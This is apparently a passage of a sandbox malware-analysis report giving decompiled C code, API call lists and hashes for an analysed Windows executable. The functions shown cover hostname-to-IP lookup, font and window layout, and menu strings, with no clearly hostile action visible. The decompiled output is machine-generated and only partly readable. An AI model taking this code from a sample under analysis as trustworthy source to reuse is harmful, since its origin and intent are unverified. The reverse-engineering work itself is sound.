    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID:
    • String ID: /$UT
    • API String ID: 0-1626504983
    • Opcode ID: d14897e67feb5de1872cacf77b447b8adee001a6bf3d8b80a78e4a60efebb775
    • Instruction ID: 6401665bf719d7cef6a65d4832275fd9386a2ffd512360343dbec1cb152a70d1
    • Opcode Fuzzy Hash: d14897e67feb5de1872cacf77b447b8adee001a6bf3d8b80a78e4a60efebb775
    • Instruction Fuzzy Hash: 3102F071A043589BDB218F65C8417DFBBB9AF14308F1404AFE489A7242DF789EC9CB59
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E0042A943(CHAR* _a4) {
    				char _v12;
    				signed int _v16;
    				signed char _v20;
    				intOrPtr _v24;
    				unsigned int _v28;
    				char _v128;
    				char _v528;
    				unsigned int _t43;
    				char* _t69;
    				CHAR* _t71;
    				intOrPtr* _t81;
    				void* _t82;
    
    				_push( &_v528);
    				_push(0x101);
    				L0043E9E2();
    				 *_a4 =  *_a4 & 0x00000000;
    				_t43 = gethostname( &_v128, 0x64);
    				if(_t43 == 0) {
    					_t43 = lstrcmpA( &_v128, 0x4550cc);
    					if(_t43 != 0) {
    						_t43 =  &_v128;
    						_push(_t43);
    						L0043E9A0();
    						_v28 = _t43;
    						if(_t43 != 0) {
    							_t43 =  *(_t43 + 0xc);
    							_v24 = 1;
    							if(_t43 != 0) {
    								_v16 = _v16 & 0x00000000;
    								_t81 = __imp___itoa;
    								_t71 = ".";
    								while(1) {
    									_t43 =  *(_v16 + _t43);
    									if(_t43 == 0) {
    										goto L10;
    									}
    									L0043E9DC();
    									_v20 = _t43;
    									 *_t81(_t43 >> 0x00000018 & 0x000000ff,  &_v12, 0xa,  *_t43);
    									lstrcatA(_a4,  &_v12);
    									 *_t81(_v20 >> 0x00000010 & 0x000000ff,  &_v12, 0xa);
    									lstrcatA(_a4, _t71);
    									strcat(_a4,  &_v12);
    									 *_t81(_v20 >> 0x00000008 & 0x000000ff,  &_v12, 0xa);
    									lstrcatA(_a4, _t71);
    									strcat(_a4,  &_v12);
    									 *_t81(_v20 & 0x000000ff,  &_v12, 0xa);
    									_t82 = _t82 + 0x40;
    									lstrcatA(_a4, _t71);
    									_t69 = strcat(_a4,  &_v12);
    									_v16 = _v16 + 4;
    									if(_v24 >= 6) {
    										L0043E9D6();
    										return _t69;
    									}
    									_v24 = _v24 + 1;
    									_t43 =  *(_v28 + 0xc);
    									if(_v16 + _t43 != 0) {
    										continue;
    									} else {
    										return _t43;
    									}
    									L11:
    								}
    							}
    						}
    					}
    				}
    				L10:
    				return _t43;
    				goto L11;
    			}

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: _itoalstrcat$strcat$CleanupStartupgethostbynamegethostnamehtonllstrcmp
    • String ID: h?E
    • API String ID: 3535020029-3891125417
    • Opcode ID: 2ade5b4448097ad9d2dacf7f29a1b83ee3970574940c360efec6441c633fba16
    • Instruction ID: c2f7cf9f2db01428509a8c948451630f9880baa49d6fa6bb967812c5d754f885
    • Opcode Fuzzy Hash: 2ade5b4448097ad9d2dacf7f29a1b83ee3970574940c360efec6441c633fba16
    • Instruction Fuzzy Hash: 5B416CB5A0021DABEB10EBA5DC41EFE7BB8EF04305F40446AF901E6191E739DA54CBA5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 81%
    			E0040E1F7(void* __ecx) {
    				struct HFONT__* _t39;
    				intOrPtr _t43;
    				void* _t45;
    				struct HWND__* _t46;
    				void* _t71;
    				void* _t74;
    				void* _t76;
    
    				E0043E4E0(0x4400f8, _t76);
    				_t74 = __ecx;
    				_push(__ecx);
    				L0043E24C();
    				 *(_t76 - 4) = 0;
    				 *(_t76 - 0x10) = 0;
    				_t39 = strcmp( *(__ecx + 0x40), 0x4550cc);
    				if(_t39 != 0) {
    					_t71 = _t74 + 0x54;
    					if(_t71 == 0 ||  *((intOrPtr*)(_t71 + 4)) == 0) {
    						_t39 = CreateFontA(0x12, 0, 0, 0, 0x2bc, 0, 0, 0, 1, 0, 0, 0, 0, "Arial");
    						_push(_t39);
    						L0043DD60();
    					}
    					if(_t71 != 0 &&  *((intOrPtr*)(_t71 + 4)) != 0) {
    						_push(_t71);
    						L0043E108();
    						 *(_t76 - 0x10) = _t39;
    					}
    				} else {
    					_t46 = GetParent( *(_t74 + 0x20));
    					_push(_t46);
    					L0043DD9C();
    					if(_t46 != 0) {
    						_push(E0040CD41(_t46));
    						L0043E108();
    					}
    				}
    				L0043DDD8();
    				 *(_t76 - 4) = 1;
    				L0043E19E();
    				L0043E246();
    				L0043E024();
    				GetClientRect( *(_t74 + 0x20), _t76 - 0x24);
    				_t43 =  *((intOrPtr*)(_t76 - 0x14));
    				 *(_t76 - 0x24) =  *(_t76 - 0x24) + 5;
    				_t45 =  *((intOrPtr*)( *((intOrPtr*)(_t76 - 0x78)) + 0x70))(_t43,  *((intOrPtr*)(_t43 - 8)), _t76 - 0x24, 0x24, 1,  *((intOrPtr*)(_t74 + 0x50)), _t76 - 0x14);
    				if( *(_t76 - 0x10) != 0) {
    					_push( *(_t76 - 0x10));
    					L0043E108();
    				}
    				 *(_t76 - 4) = 0;
    				L0043DD36();
    				 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
    				L0043E240();
    				 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
    				return _t45;
    			}

    APIs
    • __EH_prolog.LIBCMT ref: 0040E1FC
    • #470.MFC42 ref: 0040E20D
    • strcmp.MSVCRT ref: 0040E222
    • GetParent.USER32(?), ref: 0040E230
    • #2864.MFC42(00000000), ref: 0040E237
      • Part of subcall function 0040CD41: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 0040CD4A
      • Part of subcall function 0040CD41: #2860.MFC42(00000000), ref: 0040CD51
    • #5788.MFC42(00000000,00000000), ref: 0040E24B
    • CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,Arial), ref: 0040E276
    • #1641.MFC42(00000000), ref: 0040E27F
    • #5788.MFC42(?,00000000), ref: 0040E291
    • #540.MFC42(00000000), ref: 0040E29C
    • #3874.MFC42(?,00000000), ref: 0040E2AB
    • #6172.MFC42(?,?,00000000), ref: 0040E2B6
    • #5875.MFC42(00000001,?,?,00000000), ref: 0040E2C0
    • GetClientRect.USER32 ref: 0040E2CC
    • #5788.MFC42(?), ref: 0040E2F8
    • #800.MFC42(?), ref: 0040E303
    • #755.MFC42(?), ref: 0040E30F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #5788$#1641#2860#2864#3874#470#540#5875#6172#755#800ClientCreateFontH_prologMessageParentRectSendstrcmp
    • String ID: Arial
    • API String ID: 869321981-493054409
    • Opcode ID: 64f44c05090a5ce93d35d48ea254e1ae060c4c7c0aca2a41495d4509b328e26c
    • Instruction ID: 9d24cc71ab2be486ceef0cba926b899b44a0bbd512ae11decd882465e5142d6b
    • Opcode Fuzzy Hash: 64f44c05090a5ce93d35d48ea254e1ae060c4c7c0aca2a41495d4509b328e26c
    • Instruction Fuzzy Hash: 67314C71901209AFEF24EBA6D9859AEBBB8EB44308F10156EF102A31D2DB745E44CA65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E0041A108(void* __eax) {
    
    				_push("None");
    				L0043DE26();
    				_push("User defined");
    				L0043DE26();
    				_push("Open");
    				L0043DE26();
    				_push("Print");
    				L0043DE26();
    				_push("Explore");
    				L0043DE26();
    				_push("E-mail");
    				L0043DE26();
    				return __eax;
    			}

    0x0041a108
    0x0041a112
    0x0041a117
    0x0041a121
    0x0041a126
    0x0041a130
    0x0041a135
    0x0041a13f
    0x0041a144
    0x0041a14e
    0x0041a153
    0x0041a15d
    0x0041a162

    APIs
    • #537.MFC42(None,0041A103), ref: 0041A112
    • #537.MFC42(User defined,None,0041A103), ref: 0041A121
    • #537.MFC42(Open,User defined,None,0041A103), ref: 0041A130
    • #537.MFC42(Print,Open,User defined,None,0041A103), ref: 0041A13F
    • #537.MFC42(Explore,Print,Open,User defined,None,0041A103), ref: 0041A14E
    • #537.MFC42(E-mail,Explore,Print,Open,User defined,None,0041A103), ref: 0041A15D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537
    • String ID: 0TE$4TE$8TE$<TE$@TE$DTE$E-mail$Explore$None$Open$Print$User defined
    • API String ID: 4256512136-32927017
    • Opcode ID: 092ffe6f372c828e82e7bffaf58c654d7a7c9826ba7a7431bb73b3de8e081e94
    • Instruction ID: 73e4406fa2772d6a1ec696d3d4fda1fab40ea0f81ae6f5fab2559b83371fe6ac
    • Opcode Fuzzy Hash: 092ffe6f372c828e82e7bffaf58c654d7a7c9826ba7a7431bb73b3de8e081e94
    • Instruction Fuzzy Hash: E5D0AC00F81D419545187E51E433B3D5842CB9D7CBBE1A25F7D451E1D38E5C5A9C452E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E0040D1F3(void* __eax) {
    
    				_push("None");
    				L0043DE26();
    				_push("User defined");
    				L0043DE26();
    				_push("Open");
    				L0043DE26();
    				_push("Print");
    				L0043DE26();
    				_push("Explore");
    				L0043DE26();
    				_push("E-mail");
    				L0043DE26();
    				return __eax;
    			}

    0x0040d1f3
    0x0040d1fd
    0x0040d202
    0x0040d20c
    0x0040d211
    0x0040d21b
    0x0040d220
    0x0040d22a
    0x0040d22f
    0x0040d239
    0x0040d23e
    0x0040d248
    0x0040d24d

    APIs
    • #537.MFC42(None,0040D1EE), ref: 0040D1FD
    • #537.MFC42(User defined,None,0040D1EE), ref: 0040D20C
    • #537.MFC42(Open,User defined,None,0040D1EE), ref: 0040D21B
    • #537.MFC42(Print,Open,User defined,None,0040D1EE), ref: 0040D22A
    • #537.MFC42(Explore,Print,Open,User defined,None,0040D1EE), ref: 0040D239
    • #537.MFC42(E-mail,Explore,Print,Open,User defined,None,0040D1EE), ref: 0040D248
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537
    • String ID: ,SE$0SE$4SE$8SE$<SE$@SE$E-mail$Explore$None$Open$Print$User defined
    • API String ID: 4256512136-2608041025
    • Opcode ID: c38da603a23d79d850e4ec713ec52a7e9ddcf9d635fe74a6752e337ccf4452fe
    • Instruction ID: c869f87ddccfd343abebd6a45f73851d49436e38d67775af8096dd2795011197
    • Opcode Fuzzy Hash: c38da603a23d79d850e4ec713ec52a7e9ddcf9d635fe74a6752e337ccf4452fe
    • Instruction Fuzzy Hash: 14D0B200F41E44E145147FA5E43793D5842CB9C7C7BA1A15F7D451E1D38DDC5A1C852D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 42%
    			E0041B35A(void* __eax) {
    
    				_push("None");
    				L0043DE26();
    				_push("User defined");
    				L0043DE26();
    				_push("Open");
    				L0043DE26();
    				_push("Print");
    				L0043DE26();
    				_push("Explore");
    				L0043DE26();
    				_push("E-mail");
    				L0043DE26();
    				return __eax;
    			}

    0x0041b35a
    0x0041b364
    0x0041b369
    0x0041b373
    0x0041b378
    0x0041b382
    0x0041b387
    0x0041b391
    0x0041b396
    0x0041b3a0
    0x0041b3a5
    0x0041b3af
    0x0041b3b4

    APIs
    • #537.MFC42(None,0041B355), ref: 0041B364
    • #537.MFC42(User defined,None,0041B355), ref: 0041B373
    • #537.MFC42(Open,User defined,None,0041B355), ref: 0041B382
    • #537.MFC42(Print,Open,User defined,None,0041B355), ref: 0041B391
    • #537.MFC42(Explore,Print,Open,User defined,None,0041B355), ref: 0041B3A0
    • #537.MFC42(E-mail,Explore,Print,Open,User defined,None,0041B355), ref: 0041B3AF
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp
    • Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_executable.jbxd
    Similarity
    • API ID: #537
    • String ID: E-mail$Explore$None$Open$Print$User defined$`TE$dTE$hTE$lTE$pTE$tTE
    • API String ID: 4256512136-3079219102
    • Opcode ID: 69a47cede2d03b0bb6efc366654952fd9a8a0d7b37d0343ff3d1d3a4531b9625
    • Instruction ID: 1a735a580a868a8322fc040d4fc904d58654d3212fd4202c163a39e7178dc815
    • Opcode Fuzzy Hash: 69a47cede2d03b0bb6efc366654952fd9a8a0d7b37d0343ff3d1d3a4531b9625
    • Instruction Fuzzy Hash: 60D06200F80E405109187E51E43373D4842C79D7CB794A21F7D421E1C38D4C0A5DC92E
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 71%
    			E0040C88B(void* __ecx) {
    				void* _t88;
    				struct HWND__* _t89;
    				struct HDC__* _t94;
    				void* _t95;
    				struct tagSIZE _t104;
    				signed char _t106;
    				struct HWND__* _t110;
    				void* _t115;
    				void* _t140;
    				struct tagSIZE* _t161;
    				signed char _t165;
    				struct HDC__* _t169;
    				void* _t171;
    				void* _t174;
    
    				_t88 = E0043E4E0(0x43fddc, _t174);
    				_t140 = __ecx;
    				_t89 = E0040CC69(_t88, __ecx);
    				if(_t89 != 0) {
    					_t89 = GetParent( *(_t140 + 0x20));
    					_push(_t89);
    					L0043DD9C();
    					 *(_t174 - 0x20) = _t89;
    					if(_t89 != 0) {
    						if( *((intOrPtr*)(_t140 + 0xb0)) != 0) {
    							GetWindowRect( *(_t140 + 0x20), _t174 - 0x1c);
    							_push(_t174 - 0x1c);
    							L0043E02A();
    							L0043DDD8();
    							_push(_t174 - 0x24);
    							 *(_t174 - 4) = 0;
    							L0043E19E();
    							_t94 = GetDC( *(_t140 + 0x20));
    							_push(_t94);
    							L0043DD96();
    							_t169 = _t94;
    							_t95 = _t140 + 0x44;
    							 *((intOrPtr*)(_t174 - 0x28)) = 0;
    							if(_t95 != 0 &&  *((intOrPtr*)(_t95 + 4)) != 0) {
    								 *((intOrPtr*)(_t174 - 0x28)) =  *((intOrPtr*)(_t169->i + 0x30))(_t95);
    							}
    							_t161 = _t174 - 0x38;
    							GetTextExtentPoint32A( *(_t169 + 8),  *(_t174 - 0x24),  *( *(_t174 - 0x24) - 8), _t161);
    							_t165 =  *(_t174 - 0x34);
    							 *(_t174 - 0x30) =  *(_t174 - 0x38);
    							if( *((intOrPtr*)(_t174 - 0x28)) != 0) {
    								 *((intOrPtr*)(_t169->i + 0x30))( *((intOrPtr*)(_t174 - 0x28)));
    							}
    							ReleaseDC( *(_t140 + 0x20),  *(_t169 + 4));
    							GetClientRect( *( *(_t174 - 0x20) + 0x20), _t174 - 0x48);
    							_t104 =  *((intOrPtr*)(_t174 - 0x40)) -  *(_t174 - 0x48);
    							if( *(_t174 - 0x38) > _t104) {
    								 *(_t174 - 0x30) = _t104;
    							}
    							_t106 =  *((intOrPtr*)(_t174 - 0x3c)) -  *((intOrPtr*)(_t174 - 0x44));
    							if(_t165 > _t106) {
    								_t165 = _t106;
    							}
    							L0043E18C();
    							 *(_t174 - 0x20) = _t106;
    							if((_t106 & 0x00000002) == 0) {
    								 *((intOrPtr*)(_t174 - 0x10)) =  *((intOrPtr*)(_t174 - 0x18)) + _t165;
    							} else {
    								asm("cdq");
    								InflateRect(_t174 - 0x1c, 0,  ~( *((intOrPtr*)(_t174 - 0x10)) -  *((intOrPtr*)(_t174 - 0x18)) - _t165 - _t161 >> 1));
    							}
    							if(( *(_t174 - 0x20) & 0x00000001) == 0) {
    								if(( *(_t174 - 0x20) & 0x00000002) == 0) {
    									 *((intOrPtr*)(_t174 - 0x14)) =  *(_t174 - 0x30) +  *(_t174 - 0x1c);
    								} else {
    									 *(_t174 - 0x1c) =  *((intOrPtr*)(_t174 - 0x14)) -  *(_t174 - 0x30);
    								}
    							} else {
    								asm("cdq");
    								InflateRect(_t174 - 0x1c,  ~( *((intOrPtr*)(_t174 - 0x14)) -  *(_t174 - 0x30) -  *(_t174 - 0x1c) - _t161 >> 1), 0);
    							}
    							 *(_t174 - 4) =  *(_t174 - 4) | 0xffffffff;
    							L0043DD36();
    						} else {
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    							asm("movsd");
    						}
    						_t171 = _t140 + 0x54;
    						if(_t171 != 0) {
    							_t110 =  *(_t171 + 0x20);
    						} else {
    							_t110 = 0;
    						}
    						if(IsWindow(_t110) != 0) {
    							_push(1);
    							_t115 = _t174 - 0x174;
    							_push(_t140);
    							_push(_t115);
    							L0043E198();
    							if(_t115 != 0) {
    								 *((intOrPtr*)(_t174 - 0x164)) = 0;
    								 *((intOrPtr*)(_t174 - 0x160)) = 0;
    								 *((intOrPtr*)(_t174 - 0x15c)) =  *((intOrPtr*)(_t174 - 0x14)) -  *(_t174 - 0x1c);
    								 *((intOrPtr*)(_t174 - 0x158)) =  *((intOrPtr*)(_t174 - 0x10)) -  *((intOrPtr*)(_t174 - 0x18));
    								SendMessageA( *(_t140 + 0x74), 0x409, 0, _t174 - 0x174);
    							}
    						}
    						_push(4);
    						_push( *((intOrPtr*)(_t174 - 0x10)) -  *((intOrPtr*)(_t174 - 0x18)));
    						_t89 =  *((intOrPtr*)(_t174 - 0x14)) -  *(_t174 - 0x1c);
    						_push(_t89);
    						_push( *((intOrPtr*)(_t174 - 0x18)));
    						_push( *(_t174 - 0x1c));
    						_push(0);
    						L0043E0B4();
    					}
    				}
    				 *[fs:0x0] =  *((intOrPtr*)(_t174 - 0xc));
    				return _t89;
    			}

    0x0040c890
    0x0040c89c
    0x0040c89f
    0x0040c8a6
    0x0040c8af
    0x0040c8b5
    0x0040c8b6
    0x0040c8bd
    0x0040c8c0
    0x0040c8cf
    0x0040c8ea
    0x0040c8f6
    0x0040c8f7
    0x0040c8ff
    0x0040c909
    0x0040c90c
    0x0040c90f
    0x0040c917
    0x0040c91d
    0x0040c91e
    0x0040c923
    0x0040c925
    0x0040c92a
    0x0040c92d
    0x0040c93c
    0x0040c93c
    0x0040c942
    0x0040c94e
    0x0040c95b
    0x0040c95e
    0x0040c961
    0x0040c96a
    0x0040c96a
    0x0040c973
    0x0040c983
    0x0040c98c
    0x0040c992
    0x0040c994
    0x0040c994
    0x0040c99a
    0x0040c99f
    0x0040c9a1
    0x0040c9a1
    0x0040c9a5
    0x0040c9b0
    0x0040c9b6
    0x0040c9d7
    0x0040c9b8
    0x0040c9c0
    0x0040c9ce
    0x0040c9ce
    0x0040c9de
    0x0040c9ff
    0x0040ca14
    0x0040ca01
    0x0040ca07
    0x0040ca07
    0x0040c9e0
    0x0040c9eb
    0x0040c9f7
    0x0040c9f7
    0x0040ca17
    0x0040ca1e
    0x0040c8d1
    0x0040c8da
    0x0040c8db
    0x0040c8dc
    0x0040c8dd
    0x0040c8dd
    0x0040ca23
    0x0040ca28
    0x0040ca2e
    0x0040ca2a
    0x0040ca2a
    0x0040ca2a
    0x0040ca3a
    0x0040ca3c
    0x0040ca3e
    0x0040ca44
    0x0040ca45
    0x0040ca48
    0x0040ca4f
    0x0040ca59
    0x0040ca5f
    0x0040ca65
    0x0040ca71
    0x0040ca87
    0x0040ca87
    0x0040ca4f
    0x0040ca90
    0x0040ca97
    0x0040ca9b
    0x0040ca9e
    0x0040ca9f
    0x0040caa2
    0x0040caa5
    0x0040caa7
    0x0040caad
    0x0040c8c0
    0x0040cab2
    0x0040caba

    APIs
    • __EH_prolog.LIBCMT ref: 0040C890
      • Part of subcall function 0040CC69: #3797.MFC42(0040C750), ref: 0040CC6D
    • GetParent.USER32(?), ref: 0040C8AF
    • #2864.MFC42(00000000,?,00000000), ref: 0040C8B6
    • GetWindowRect.USER32 ref: 0040C8EA
    • #6880.MFC42(?,?,?,00000000,?,00000000), ref: 0040C8F7
    • #540.MFC42(?,?,?,00000000,?,00000000), ref: 0040C8FF
    • #3874.MFC42(?,?,?,?,00000000,?,00000000), ref: 0040C90F
    • GetDC.USER32(?), ref: 0040C917
    • #2859.MFC42(00000000,?,?,00000000,?,00000000), ref: 0040C91E
    • GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040C94E
    • ReleaseDC.USER32 ref: 0040C973
    • GetClientRect.USER32 ref: 0040C983
    • #3797.MFC42(?,?,00000000,?,00000000), ref: 0040C9A5
    • InflateRect.USER32(?,00000000,?), ref: 0040C9CE
    • InflateRect.USER32(?,?,00000000), ref: 0040C9F7
    • IsWindow.USER32(?), ref: 0040CA32
    • #3812.MFC42(?,?,00000001,?,?,00000000,?,00000000), ref: 0040CA48
    • SendMessageA.USER32(?,00000409,00000000,?), ref: 0040CA87
    • #6197.MFC42(00000000,?,?,?,?,00000004,?,?,00000000,?,00000000), ref: 0040CAA7
    Memory Dump Source
    • Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp
    • Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp
